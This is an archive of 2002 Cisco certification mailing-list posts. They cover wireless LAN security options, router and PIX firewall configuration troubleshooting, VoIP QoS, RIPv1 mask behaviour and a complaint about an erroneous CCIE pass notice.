Message ("Your message dated Sun, 10 Nov 2002 07:42:35...") [7:57180]
Your message dated Sun, 10 Nov 2002 07:42:35 -0500 (EST) with subject "Of service" has been submitted to the moderator of the CAREPL-L list: [EMAIL PROTECTED] Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57180&t=57180 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
RE: WLAN security matters [7:57160]
Most financial corportations that implement Wireless LAN (WAN) ususally do this: 1) Implement EAP-TLS. This method is "open-standard" as opposed to LEAP which is Cisco propriatery. Furthermore, LEAP is vulnerable to "man in the middle attack" while EAP-TLS is not. EAP-TLS supports mutual authentication and last but not least, EAP-TLS supports Certificate Authority (CA) in addition to password. FreeRadius (which I use) supports EAP-TLS which work great. EAP-TLS with CA solution is not a very scalable one but that is the tradeoff between security and convenience. 2) Implement IPSec to run on top of EAP-TLS which provides another layer of Security. Now, if you are "security" conscious, I would suggest you go with vendors that support AES instead of 3DES (again, Cisco has no plan of supporting AES; however, CheckPoint does). This solution doesn't work too well if you have too many users on WLAN because a lot of bandwidth will be dedicated to EAP-TLS and IPSec traffic. Again, you are trading security for speed. I've successfully implemented EAP-TLS and IPSec for WLAN a couple weeks ago. It is not that difficult. Mike "Vicky O. Mair" wrote:hi there, ping me offline and i can direct you to folks who have a (hw) solution which not only secures wlans but also does a good job protecting your overall backbone security. /vicky -Original Message- From: [EMAIL PROTECTED] [mailto:nobody@;groupstudy.com]On Behalf Of Carlos Fragoso Mariscal Sent: Saturday, November 09, 2002 9:19 AM To: [EMAIL PROTECTED] Subject: WLAN security matters [7:57160] Hello, I'm doing a research for the deployment of a secure implementation of a wireless 802.11a/b environment. Until WPA (Wireless Protected Access) from the WiFi alliance comes to life next year, I realised that WEP is the only air-side Layer 2 (crackeable) encryption protocol. This lack of security requires other upper-layer protocols to do this job such as IPSec or VPN implementations. Those solutions seem to be not very scalable indeed. I would like to know which kind of implementations are the most preferred and desirable for you. Is there anyone managing any secure deployment similar? I have heard a little bit about Cisco vendor implementation (LEAP) but I suppose it only works with both APs and client cards from Cisco. Authentication is a first step, 802.1x could help us to authenticate users and establish a secure VLAN-based traffic, but it is not a solution for air-side sniffing and spoofing. Is IPSec or VPN the only solution? If anyone has any documentation or slides about LEAP, 802.1x either wireless secure deployments, they will be appreciated. Thank you, -- Carlos Do you Yahoo!? U2 on LAUNCH - Exclusive medley & videos from Greatest Hits CD Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57182&t=57160 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
Re: VoIP+QoS+xDSL+H.323Gatekeeper [7:57104]
Mark, I saw something similar to this on a customer's pilot of AVVID. The symptoms were such that if a call between IP phones was established prior to the traffic flood, everything worked just fine. If the traffic flood came first, the destination IP phone rang, but no voice packets were received by either phone, period. And, this was in a pure LAN environment! Looking at the display on the 7960s, we discovered that not one UDP packet was arriving at either phone! (The fact that the destination phone rang would seem to indicate that TCP traffic was arriving OK). Unfortunately there was no sniffer available to capture the traffic to dissect the problem. The fix was to change the parameters on the traffic generator. The customer was using Network Observer. It was a new tool for them. The traffic being generated was designated as "raw" ethernet frames. As soon as the traffic type was changed to "TCP" or any other selection, the problem disappeared. What are you using to saturate the WAN link? What I saw might trigger some observation in your network. Bruce Mark S wrote: >Well, this should give you enough to chew on since voice is becoming a hot >topic. I am trying to configure VoIP with QoS. Why over IP and not over >ATM, you say? I have to controll the call with a H.323 Gatekeeper, and that >is IP. > >My problem appears to be that the call setup (or maybe signalling?) appears >to be delayed. The test results are as follows: > >If the WAN link is saturated with data packets PRIOR to establishing the >voice call, the first 10 to 15 (approximately) seconds of the call are >lost. After the call is established, voice is rock solid and no voice >packets are delayed or lost. > >If the voice call is established PRIOR to saturating the WAN link with data >packets, the voice call is rock solid and no voice packets are delayed or >lost. > >Thoughts or configs would be appreciated. > >--Mark > > >version 12.2 >service timestamps debug datetime msec >service timestamps log datetime msec >no service password-encryption >! >hostname Router >! >logging buffered 4096 debugging >! >memory-size iomem 25 >ip subnet-zero >! >no ip domain lookup >! >ip cef >! >voice call carrier capacity active >voice rtp send-recv >! >no voice hpi capture buffer >no voice hpi capture destination >! >vc-class atm vip > vbr-rt 256 256 10 > precedence 5 > no bump traffic > no protect vc > no protect group >! >vc-class atm normal > vbr-nrt 192 192 > precedence other > no protect vc > no protect group >! >interface ATM0/0 > ip address 1.1.1.254 255.255.255.0 > ip nat outside > no atm ilmi-keepalive > bundle-enable > bundle qosmap > protocol ip 1.1.1.1 > encapsulation aal5snap > pvc-bundle data 0/37 > class-vc normal > pvc-bundle voice 0/36 > class-vc vip > ! > dsl equipment-type CPE > dsl operating-mode GSHDSL symmetric annex A > dsl linerate AUTO > h323-gateway voip interface > h323-gateway voip id Gatekeeper ipaddr x.x.x.x 1718 > h323-gateway voip h323-id Gateway > ip rsvp bandwidth 64 64 > ip rsvp resource-provider wfq pvc >! >interface FastEthernet0/0 > ip address 10.200.100.1 255.255.255.0 > ip nat inside > speed auto >! >ip nat inside source list 1 interface ATM0/0 overload >ip classless >ip route 0.0.0.0 0.0.0.0 1.1.1.1 >no ip http server >ip pim bidir-enable >! >access-list 1 permit 10.200.100.0 0.0.0.255 >! >call rsvp-sync >! >voice-port 2/0 > station-id name StaID > station-id number 111222 > caller-id enable >! >voice-port 2/1 > station-id name StaID > station-id number 111222 > caller-id enable >! >dial-peer cor custom >! >dial-peer voice 1 voip > destination-pattern T > session target ras >! >gateway >! >line con 0 >line aux 0 >line vty 0 4 > login >! >no scheduler allocate >end -- Bruce Enders Email: [EMAIL PROTECTED] Chesapeake NetCraftsmeno:(410)-280-6927, c:(443)-994-0678 1290 Bay Dale Drive, Suite 312 WWW: http://www.netcraftsmen.net Arnold, MD 21012-2325 Cisco CCSI# 96047 Efax 443-331-0651 Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57184&t=57104 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
RE: Congrats you passed... psyche... you didn't [7:57181]
Michale, That really hurts, I am sorry and don't give up you will do fine next time, Sometime God test us in many different ways that we can not explains, he works in a very strange way. What bothers me the most is the not apologies from Cisco. Juan Blanco -Original Message- From: [EMAIL PROTECTED] [mailto:nobody@;groupstudy.com]On Behalf Of Yonkerbonk Sent: Sunday, November 10, 2002 2:56 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Congrats you passed... psyche... you didn't Hi all, I took my Security lab in Brussels on October 17th. I received an email notification the next day congratulating me on passing. I flew back to the USA and told everyone and we celebrated and had a grand old time. My company made a big deal out of me being their first double CCIE and all that. Then a few days later I checked on the website and it said I failed. So I sent Cisco an email asking WTF?! Nothing for two days. So I sent them another email. Finally they wrote back and said, "Oh, it was a bug in our email system. Sorry for any confusion." What kind of crap with that? I had to go back and explain to everyone that I had actually failed. What if I had received gifts/bonuses/job offers because of my passing? Plus I think their attitude is totally unacceptable. No real apology. And how come I had to find it out? If they knew it was a bug they should have contacted me. Anyway, just wanted to let some bitter steam off my chest. Next time you get an email saying you passed... better check twice. Michael Le, CCIE #6811 __ Do you Yahoo!? U2 on LAUNCH - Exclusive greatest hits videos http://launch.yahoo.com/u2 Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57181&t=57181 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
RE: Congrats you passed... psyche... you didn't [7:57183]
Michale, That really hurts, I am sorry and don't give up you will do fine next time, Sometime God test us in many different ways that we can not explains, he works in a very strange way. What bothers me the most is the not apologies from Cisco. Juan Blanco -Original Message- From: [EMAIL PROTECTED] [mailto:nobody@;groupstudy.com]On Behalf Of Yonkerbonk Sent: Sunday, November 10, 2002 2:56 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Congrats you passed... psyche... you didn't Hi all, I took my Security lab in Brussels on October 17th. I received an email notification the next day congratulating me on passing. I flew back to the USA and told everyone and we celebrated and had a grand old time. My company made a big deal out of me being their first double CCIE and all that. Then a few days later I checked on the website and it said I failed. So I sent Cisco an email asking WTF?! Nothing for two days. So I sent them another email. Finally they wrote back and said, "Oh, it was a bug in our email system. Sorry for any confusion." What kind of crap with that? I had to go back and explain to everyone that I had actually failed. What if I had received gifts/bonuses/job offers because of my passing? Plus I think their attitude is totally unacceptable. No real apology. And how come I had to find it out? If they knew it was a bug they should have contacted me. Anyway, just wanted to let some bitter steam off my chest. Next time you get an email saying you passed... better check twice. Michael Le, CCIE #6811 __ Do you Yahoo!? U2 on LAUNCH - Exclusive greatest hits videos http://launch.yahoo.com/u2 Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57183&t=57183 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
VPN Concentrator Issue [7:57185]
I Have the folowing setup VPN-Client--VPN-Concentrator---ipsec-tunnel---PIX Connections from the networks on the inside of the pix to the concentrator private network workes fine connections from the VPN Client to the concentrator private network worke fine. But I cant connect from the Inside network of the PIX to the VPN Client. If I use Debug ICMP Trace on the PIX I can see the Echo Requests from the vpn client when I ping a device on the inside of the pix, and vice versa when I ping to the VPN client. But there are no ECHO replays getting through... any thoughts.. Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57185&t=57185 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
RE: VTP Concentrator - client to client [7:44276]
Yes you can do this with the Reverse Route Injection, I have used it, it´s easy to setup. Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57186&t=44276 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
RE: VPN Concentrator Issue [7:57185]
>From my little knowledge the pix supports ipsec passthru, meaning there should be nothing special you have to do to the pix to get it to work with this setup. But are you using NAT because if so there may be some adjustment on the vpn client that needs to be adjusted like enabling transparent tunneling on the client. -Original Message- From: Arni V. Skarphedinsson [mailto:nobody@;groupstudy.com] Sent: Sunday, November 10, 2002 9:04 AM To: [EMAIL PROTECTED] Subject: VPN Concentrator Issue [7:57185] I Have the folowing setup VPN-Client--VPN-Concentrator---ipsec-tunnel---PIX Connections from the networks on the inside of the pix to the concentrator private network workes fine connections from the VPN Client to the concentrator private network worke fine. But I cant connect from the Inside network of the PIX to the VPN Client. If I use Debug ICMP Trace on the PIX I can see the Echo Requests from the vpn client when I ping a device on the inside of the pix, and vice versa when I ping to the VPN client. But there are no ECHO replays getting through... any thoughts.. Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57187&t=57185 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
Problem pinging from inside thru PIX to outside [7:57188]
Hi Group, I am trying to deploy a VPN solution and ran into a seemingly simple problem which I cant seem able to resolve. I terminated the radio link from the ISP on fa0/0 of my Cisco 2621 router. I connected fa0/1 of 2621 to e0/0, the outside of my PIX 506 by cross cable and connected e0/1, the inside of PIX to LAN switch. The inside network has address 10.240.77.0/24 and the VPN is between Exchange server at 10.240.77.3 and the larger 10.240.0.0 network. The ISP has assigned me the following IP addresses 66.135.55.171, .172, .173 and .174 from a subnet with mask 255.255.255.192. So I assigned .171 to fa0/1 - inside of 2621, .172 to e0/0 - outside of PIX, .173 as global on PIX for PAT and reserved .174 for a future VG. I wanted to put the config thru its paces by pinging round the PIX. For testing, I had entered on the PIX: conduit permit ICMP any any access-list aclout permit icmp any any access-list aclin permit icmp any any access-group aclout in interface outside When I tried to apply aclin for outbound icmp, with the command: access-group aclin out interface inside the PIX responded with: Type help or '?' for list of available commands. When I repeated the command with ? at the end, the PIX responded with: usage: [no] access-group in interface inside It seemed the PIX only requires permitting inbound ICMP from the outside. So I proceeded with the pings. My output is below: >From Router: NB: pixout, pixin and exchange are host entries on router for PIX outside interface, PIX inside interface and exchange server with IP addresses 66.135.55.172, 10.240.77.1 and 10.240.77.3 respectively. MyRouter#ping pixout Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 66.135.55.172, timeout is 2 seconds: ! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/4 ms MyRouter#ping pixin Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 10.240.77.1, timeout is 2 seconds: ! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/4 ms MyRouter#ping exchange Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 10.250.77.3, timeout is 2 seconds: ! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/4 ms >From PIX: NB: I used on the pix for name-to-IP address mapping the following: names name 66.135.55.171 gateway name 10.240.77.3 exchange PIX# ping gateway gateway response received -- 0ms gateway response received -- 0ms gateway response received -- 0ms PIX# ping exchange exchange response received -- 0ms exchange response received -- 0ms exchange response received -- 0ms PIX# >From Exchange: C:\>ping 10.240.77.1 Pinging 10.240.77.1 with 32 bytes of data: Reply from 10.240.77.1: bytes=32 timeping 66.135.55.171 Pinging 66.135.55.171 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 66.135.55.171: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms C:\>ping 66.135.55.172 Pinging 66.135.55.172 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 66.135.55.172: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms C:\> I can ping from the router thru the PIX to the Exchange server in the inside network, from the PIX all around, from the Exchange to the PIX inside interface but not from Exchange to the PIX outside interface and to the router. I know it gotta be something simple, but cant seem able to figure it out. The PIX is 506E version 6.1(2). I will appreciate greatly if somebody will just point to me what I'm missing. TIA. _ MSN 8 with e-mail virus protection service: 2 months FREE* http://join.msn.com/?page=features/virus Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57188&t=57188 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
RE: Problem pinging from inside thru PIX to outside [7:57188]
09186a0080094e8a.shtml#pingown Look at that link watchout for word wrap. Hope it helps. You have to enable ping terminating on a pix interface. -Original Message- From: Tunji Suleiman [mailto:tunjisule@;hotmail.com] Sent: Sunday, November 10, 2002 9:39 AM To: [EMAIL PROTECTED] Subject: Problem pinging from inside thru PIX to outside [7:57188] Hi Group, I am trying to deploy a VPN solution and ran into a seemingly simple problem which I cant seem able to resolve. I terminated the radio link from the ISP on fa0/0 of my Cisco 2621 router. I connected fa0/1 of 2621 to e0/0, the outside of my PIX 506 by cross cable and connected e0/1, the inside of PIX to LAN switch. The inside network has address 10.240.77.0/24 and the VPN is between Exchange server at 10.240.77.3 and the larger 10.240.0.0 network. The ISP has assigned me the following IP addresses 66.135.55.171, .172, .173 and .174 from a subnet with mask 255.255.255.192. So I assigned .171 to fa0/1 - inside of 2621, .172 to e0/0 - outside of PIX, .173 as global on PIX for PAT and reserved .174 for a future VG. I wanted to put the config thru its paces by pinging round the PIX. For testing, I had entered on the PIX: conduit permit ICMP any any access-list aclout permit icmp any any access-list aclin permit icmp any any access-group aclout in interface outside When I tried to apply aclin for outbound icmp, with the command: access-group aclin out interface inside the PIX responded with: Type help or '?' for list of available commands. When I repeated the command with ? at the end, the PIX responded with: usage: [no] access-group in interface inside It seemed the PIX only requires permitting inbound ICMP from the outside. So I proceeded with the pings. My output is below: >From Router: NB: pixout, pixin and exchange are host entries on router for PIX outside interface, PIX inside interface and exchange server with IP addresses 66.135.55.172, 10.240.77.1 and 10.240.77.3 respectively. MyRouter#ping pixout Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 66.135.55.172, timeout is 2 seconds: ! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/4 ms MyRouter#ping pixin Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 10.240.77.1, timeout is 2 seconds: ! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/4 ms MyRouter#ping exchange Type escape sequence to abort. Sending 5, 100-byte ICMP Echos to 10.250.77.3, timeout is 2 seconds: ! Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/4 ms >From PIX: NB: I used on the pix for name-to-IP address mapping the following: names name 66.135.55.171 gateway name 10.240.77.3 exchange PIX# ping gateway gateway response received -- 0ms gateway response received -- 0ms gateway response received -- 0ms PIX# ping exchange exchange response received -- 0ms exchange response received -- 0ms exchange response received -- 0ms PIX# >From Exchange: C:\>ping 10.240.77.1 Pinging 10.240.77.1 with 32 bytes of data: Reply from 10.240.77.1: bytes=32 timeping 66.135.55.171 Pinging 66.135.55.171 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 66.135.55.171: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms C:\>ping 66.135.55.172 Pinging 66.135.55.172 with 32 bytes of data: Request timed out. Request timed out. Request timed out. Request timed out. Ping statistics for 66.135.55.172: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms C:\> I can ping from the router thru the PIX to the Exchange server in the inside network, from the PIX all around, from the Exchange to the PIX inside interface but not from Exchange to the PIX outside interface and to the router. I know it gotta be something simple, but cant seem able to figure it out. The PIX is 506E version 6.1(2). I will appreciate greatly if somebody will just point to me what I'm missing. TIA. _ MSN 8 with e-mail virus protection service: 2 months FREE* http://join.msn.com/?page=features/virus Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57189&t=57188 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
RE: Congrats you passed... psyche... you didn't [7:57183]
Sue the damn *#@!!! :-) That's really messed up man.How could they mess up somthing like this? Here is what I would "fight" for.Atleast a free lab for the 2nd try and some goodies! Good Luck!! >From: "Juan Blanco" >Reply-To: "Juan Blanco" >To: [EMAIL PROTECTED] >Subject: RE: Congrats you passed... psyche... you didn't [7:57183] >Date: Sun, 10 Nov 2002 14:03:55 GMT > >Michale, > >That really hurts, I am sorry and don't give up you will do fine next time, >Sometime God test us >in many different ways that we can not explains, he works in a very strange >way. What bothers me >the most is the not apologies from Cisco. > >Juan Blanco > >-Original Message- >From: [EMAIL PROTECTED] [mailto:nobody@;groupstudy.com]On Behalf Of >Yonkerbonk >Sent: Sunday, November 10, 2002 2:56 AM >To: [EMAIL PROTECTED] >Cc: [EMAIL PROTECTED] >Subject: Congrats you passed... psyche... you didn't > > >Hi all, > >I took my Security lab in Brussels on October 17th. I >received an email notification the next day >congratulating me on passing. I flew back to the USA >and told everyone and we celebrated and had a grand >old time. My company made a big deal out of me being >their first double CCIE and all that. >Then a few days later I checked on the website and it >said I failed. So I sent Cisco an email asking WTF?! >Nothing for two days. So I sent them another email. >Finally they wrote back and said, "Oh, it was a bug in >our email system. Sorry for any confusion." >What kind of crap with that? I had to go back and >explain to everyone that I had actually failed. What >if I had received gifts/bonuses/job offers because of >my passing? Plus I think their attitude is totally >unacceptable. No real apology. And how come I had to >find it out? If they knew it was a bug they should >have contacted me. >Anyway, just wanted to let some bitter steam off my >chest. Next time you get an email saying you passed... >better check twice. > >Michael Le, CCIE #6811 > >__ >Do you Yahoo!? >U2 on LAUNCH - Exclusive greatest hits videos misconduct and Nondisclosure violations to [EMAIL PROTECTED] STOP MORE SPAM with the new MSN 8 and get 2 months FREE* Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57190&t=57183 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
Re: How RIPv1 masks are determined - confused [7:57049]
Tom Martin wrote:
> Robert,
>
> I believe that your diagram should reflect R1's serial interface to R2
> as s0/1 instead of s0/0. This caused me some confusion in trying to
> figure out the configs. Actually, there is still some confusion given
Sorry for that - this was copy-pasting error (there's a whole bunch of
other stuff running on the routers, I had to filter these out). The
addressess are unique, obviously - if they were'nt then the router would
drop (as unroutable) the packet with src_IP equal to IP of one of its
interfaces - so the RIP update would have got no chance to enter the RIP
process.
> You make a strong argument that a more logical interpretation would be
> to use the local IP address 172.16.66.1/25 to interpret the route since
> it is the only IP address that is on the same subnet as the sending
> router (since the other IPs configured on the link should, based on
> normal IP rules, require another router to communicate with the sender).
> All documentation I've come across and configuration I have done
> indicates that the receiving router validates the update based on major
> network only, and then uses the mask of the locally configured address
> of that network to interpret the incoming networks. So, technically,
> interpreting the route as 172.16.77.0/29 isn't "wrong" -- it's just one
> of 3 possible ways of interpreting the advertised network.
That's correct - all choices, according to many written sources, are
perfectly correct. But the router has to break a tie - in this case
longest subnet mask was chosen. I'm still curious if this behaviour is
defined somewhere or this is Cisco-feature IOS-dependent one.
For reference: below is an algorithm, hopefully complete, for classfull
processing of RIP updates compiled by me from various sources and
documents including Doyle and Zinin. I had to add 'longest' to
'apply_mask_of_incoming_interface' based on results of testing this issue.
Receiving (update):
if (major net of update the same as of incoming interface ?)
{
NO:
if (any subnets of major net of update already exist in route
table known from other interfaces ?)
{
YES: discard( update );
exit();
NO: apply_classfull_mask( update );
populate_rt( update );
exit();
}
YES:
if (there are any bits in host portion)
{
NO: apply_longest_mask_of_incoming_interface( update );
populate_rt( update );
exit();
YES: apply_32_mask( update );
populate_rt( update );
exit();
}
}
Sending (update):
if (subnet of update in the same major net as outgoing interface)
{
YES: if (subnet mask is the same as subnet mask of sending
interface ?)
{
NO: if (the update is a host route ?)
{
YES: send( update );
exit();
NO: discard( update );
exit();
}
YES: send( update );
exit();
}
NO: summarize_classfull( update );
send( update );
exit();
}
>
> I'm curious as to whether your configuration works at all given the
> next-hop address (172.16.66.1) is also a valid IP address on R2. Are
> you able to ping 172.16.200.1 from R2? It seems to me that R2 should be
It will drop packet as unroutable.
robert,
--
Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=57192&t=57049
--
FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html
Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
Routing and Design Problem [7:57193]
Hi Group, I have a routing problem. I am certain my present config is alright and just need a routing entry from the ISP for things to work. But the ISP is not cooperating, insisting the problem is with my config. So I want to make sure I've not explored all options b4 reverting to them. Here's the scenario: The ISP created a global /26 subnet, say 80.80.80.128 255.255.255.192 and assign addresses from it to all their wireless clients thru a multipoint radio base-station. They assigned 80.80.80.171, .172, .173 and .174 to my client. My target is a VPN solution between an Exchange server behind the PIX to a larger network on the Internet with rfc1918 address 10.240.0.0. Presently all ISP clients use ISP's internet uplink with address 80.80.80.129 as default gateway. This works for any client with dual-homed proxy with global address on ext link to ISP and int interface to LAN with rfc1918 addresses. My situation, however has a 2611 router with 2 eth interfaces one to the ISP radio and the other to PIX firewall. So I thot up a few options. Option A: My prefered option and present config Use ISP-assigned global addresses on router internal link to PIX, PIX outside link to router, PAT address on PIX, reserve a global address for future use and rfc1918 addresses on the inside of PIX for translation by PAT. For ext radio link btw router & ISP, do one of: 1. use ip unnumbered on link to isp with config similar to: int e0/0 description link-2-isp ip unnumbered e0/1 ! int e0/1 description link-2-pix ip address 80.80.80.171 255.255.255.192 ! ip default-gateway 80.80.80.129 2. get isp to create and assign global or rfc1918 /30 subnet for the wireless link to my client, so i have a config similar to: int e0/0 description link-2-isp ip address 192.168.0.2 255.255.255.252 ! int e0/1 description link-2-pix ip address 80.80.80.171 255.255.255.192 ! ip route 0.0.0.0 0.0.0.0 e0/0 or 192.168.0.1 3. get ISP to create a /29 subnet eg 80.80.80.182 255.255.255.248 and route it to my client with a route entry like: 4. get ISP to create VLANs and corresponding routing entries to my client or other similar clients. It seemed to me eitherway, for packets to find their way back to me from the ISP and the Internet, the ISP has to create routing entries similar to: ip route 80.80.80.171 255.255.255.192 isp's-connected-interface ip route 80.80.80.172 255.255.255.192 80.80.80.171 ip route 80.80.80.173 255.255.255.192 80.80.80.171 ip route 80.80.80.174 255.255.255.192 80.80.80.171 for 1 & 2 above ip route 80.80.80.184 255.255.255.248 isp's-connected-interface for 3 & 4 above. Option B: 1. Assign 1 address from ISP-assigned global addresses, say 80.80.80.171 to router ext link to ISP, reserve for future use or waste remaining 3 since I cant reassign the addresses behind the router. Then maybe: a. Assign a private say 192.168.x.0/24 to PIX inside interface and all inside hosts including Exchange server. Assign 10.240.77.0/24 between PIX outside interface and router inside interface. b. use a combination of static and dynamic NAT on PIX for exchange and internal hosts, specifically statically translating for Exchange and dynamically for other hosts. c. use PAT on router to translate for everything originating from PIX. I have tried the IP unnumbered option on my router e0/0, but the router wont accept it, with error: point-to-point (non-multi-access) interfaces only. Now, my questions are: 1. If the ISP refuses to cooperate completely, what are the implications of Option B with the double translation on PIX and router? 2. If the ISP agrees to cooperate, which of the options in A above is the best solution? 3. Related to 2 above, if ISP agrees to cooperate with the simplest solution, which seem to me to be, just a routing entry, is it possible, and if so, how do I get to use IP unnumbered on an ethernet interface? 4. Is there any better option/solution which I have not envisaged? I should be most grateful to anybody able to assist me on this problem. Priscilla, Howard, Larry Letterman, Steve Rider ... etc etc. I will send my present configs on request. TIA. Tunji _ Add photos to your messages with MSN 8. Get 2 months FREE*. http://join.msn.com/?page=features/featuredemail Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57193&t=57193 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
copying TOS in VPDN PPTP [7:57194]
Hi all, I'm trying to do some QoS features on PPTP tunnels, so I want the TOS field from original IP header to be copied to the tunnel IP header. I tried the command "ip tos reflect" but it doesn't work. IOS version is 12.2(11)T IP PLUS. Did anybody already try it ? Here is my config : vpdn-group 3 ! Default PPTP VPDN group accept-dialin protocol pptp virtual-template 2 ip tos reflect (...) ! ! interface Loopback0 description VPN Endpoint ip address 192.168.255.254 255.255.255.255 ! interface Ethernet0 description Private LAN interface ip address 172.16.4.254 255.255.0.0 no ip proxy-arp ip nat inside no ip mroute-cache ! interface Ethernet1 description Public LAN interface bandwidth 128 ip address dhcp ip helper-address 172.16.4.15 no ip proxy-arp ip nat outside no ip mroute-cache service-policy output 3CB-Internet-128k ! interface Virtual-Template2 bandwidth 64 ip unnumbered Loopback0 peer default ip address pool LOCAL ppp authentication chap ms-chap callin ! (...) Message Posted at: http://www.groupstudy.com/form/read.php?f=7&i=57194&t=57194 -- FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
Re: Routing and Design Problem [7:57193]
sounds like you might want to hire a consultant. On Sun, 2002-11-10 at 12:23, Tunji Suleiman wrote: > Hi Group, > > I have a routing problem. I am certain my present config is alright and just > need a routing entry from the ISP for things to work. But the ISP is not > cooperating, insisting the problem is with my config. So I want to make sure > I've not explored all options b4 reverting to them. > > Here's the scenario: > > The ISP created a global /26 subnet, say 80.80.80.128 255.255.255.192 and > assign addresses from it to all their wireless clients thru a multipoint > radio base-station. They assigned 80.80.80.171, .172, .173 and .174 to my > client. My target is a VPN solution between an Exchange server behind the > PIX to a larger network on the Internet with rfc1918 address 10.240.0.0. > Presently all ISP clients use ISP's internet uplink with address > 80.80.80.129 as default gateway. This works for any client with dual-homed > proxy with global address on ext link to ISP and int interface to LAN with > rfc1918 addresses. > > My situation, however has a 2611 router with 2 eth interfaces one to the ISP > radio and the other to PIX firewall. So I thot up a few options. > > Option A: My prefered option and present config > > Use ISP-assigned global addresses on router internal link to PIX, PIX > outside link to router, PAT address on PIX, reserve a global address for > future use and rfc1918 addresses on the inside of PIX for translation by > PAT. > > For ext radio link btw router & ISP, do one of: > 1. use ip unnumbered on link to isp with config similar to: > > int e0/0 > description link-2-isp > ip unnumbered e0/1 > ! > int e0/1 > description link-2-pix > ip address 80.80.80.171 255.255.255.192 > ! > ip default-gateway 80.80.80.129 > > 2. get isp to create and assign global or rfc1918 /30 subnet for the > wireless link to my client, so i have a config similar to: > > int e0/0 > description link-2-isp > ip address 192.168.0.2 255.255.255.252 > ! > int e0/1 > description link-2-pix > ip address 80.80.80.171 255.255.255.192 > ! > ip route 0.0.0.0 0.0.0.0 e0/0 or 192.168.0.1 > > 3. get ISP to create a /29 subnet eg 80.80.80.182 255.255.255.248 and route > it to my client with a route entry like: > > 4. get ISP to create VLANs and corresponding routing entries to my client or > other similar clients. > > It seemed to me eitherway, for packets to find their way back to me from the > ISP and the Internet, the ISP has to create routing entries similar to: > > ip route 80.80.80.171 255.255.255.192 isp's-connected-interface > ip route 80.80.80.172 255.255.255.192 80.80.80.171 > ip route 80.80.80.173 255.255.255.192 80.80.80.171 > ip route 80.80.80.174 255.255.255.192 80.80.80.171 for 1 & 2 above > > ip route 80.80.80.184 255.255.255.248 isp's-connected-interface for 3 & 4 > above. > > Option B: > > 1. Assign 1 address from ISP-assigned global addresses, say 80.80.80.171 to > router ext link to ISP, reserve for future use or waste remaining 3 since I > cant reassign the addresses behind the router. Then maybe: > > a. Assign a private say 192.168.x.0/24 to PIX inside interface and all > inside hosts including Exchange server. Assign 10.240.77.0/24 between PIX > outside interface and router inside interface. > > b. use a combination of static and dynamic NAT on PIX for exchange and > internal hosts, specifically statically translating for Exchange and > dynamically for other hosts. > 